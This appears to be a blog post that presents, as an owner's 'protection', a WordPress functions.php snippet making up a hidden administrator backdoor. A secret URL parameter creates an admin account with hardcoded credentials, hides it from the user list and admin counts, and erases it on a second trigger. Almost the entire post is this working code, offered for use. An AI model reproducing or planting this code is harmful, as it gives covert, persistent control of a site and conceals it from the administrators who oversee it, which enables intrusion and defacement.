It’s a compilation of what I found on the Web concerning the below mentioned topic, plus a couple of my own lines of code.
It’s not about the Dark side, it’s about an instance when someone wants to have an additional level of security when it comes to their accessing WP site in a ‘situation’. So if You are the owner of the project - this is the way you may want to have the protection:
-
afrer securing the code to functions.php you enter: /yoursite/?backdoor=go
-
it will create a new admin user in your DB;
-
you log into the newly created account with ‘mr_admin’, 'pa55w0rd! credentials. You have it.
!With the provided snippet you will not be shown in the WP pannel, even as a users_count.
-
After performing the task you type /yoursite/?backdoor=leave
-
it removes all traces of your presense from the DB, including your Meta.
-
if there’re any Q feel free to contact.
// Alt entr
add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'mr_admin' ) ) {
$user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
//* Show number of admins minus 1
if ( username_exists( 'mr_admin' ) ) {
add_filter("views_users", "site_list_table_views");
function site_list_table_views($views){
$users = count_users();
$admins_num = $users['avail_roles']['administrator'] - 1;
$all_num = $users['total_users'] - 1;
$class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current";
$class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current";
$views['administrator'] = '<a href="users.php?role=administrator" class="' . $class_adm . '">' . translate_user_role('Administrator') . ' <span class="count">(' . $admins_num . ')</span></a>';
$views['all'] = '<a href="users.php" class="' . $class_all . '">' . __('All') . ' <span class="count">(' . $all_num . ')</span></a>';
return $views;
}
}
//hide alt entr
function w45345p_hide_specific_user($user_search) {
global $wpdb;
$user_search->query_where =
str_replace('WHERE 1=1',
"WHERE 1=1 AND {$wpdb->users}.user_login != 'mr_admin'",
$user_search->query_where
);
}
add_action('pre_user_query','w45345p_hide_specific_user');
//remove user
add_action( 'init', 'backdoor_delete_user');
function backdoor_delete_user() {
if ( md5( $_GET['backdoor'] ) == '6c374e70334072aeeb62ed46ea987838' ) {
require_once( ABSPATH . 'wp-admin/includes/user.php' );
$user = get_user_by( 'login', 'mr_admin' );
if ( $user ) {
wp_delete_user( $user->ID, 1);
delete_user_meta( $user->ID, $key = '');
}
}
}